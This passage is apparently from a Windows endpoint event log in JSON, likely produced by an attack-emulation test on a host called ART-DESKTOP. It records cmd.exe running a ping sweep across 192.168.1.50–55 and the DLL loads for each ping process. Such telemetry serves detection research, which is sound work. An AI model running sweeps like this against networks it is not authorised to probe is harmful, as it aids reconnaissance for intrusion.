"timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "process", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572221990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.50", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572222140000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "process", - 
"pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572226830000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.51", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - 
"unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "process", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572231830000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.52", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6300, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572231980000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": 
"{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "process", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572236990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.53", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3380, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "process", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572241830000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.54", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572242020000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "process", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572246830000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.55", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3496, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572246980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3496, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": 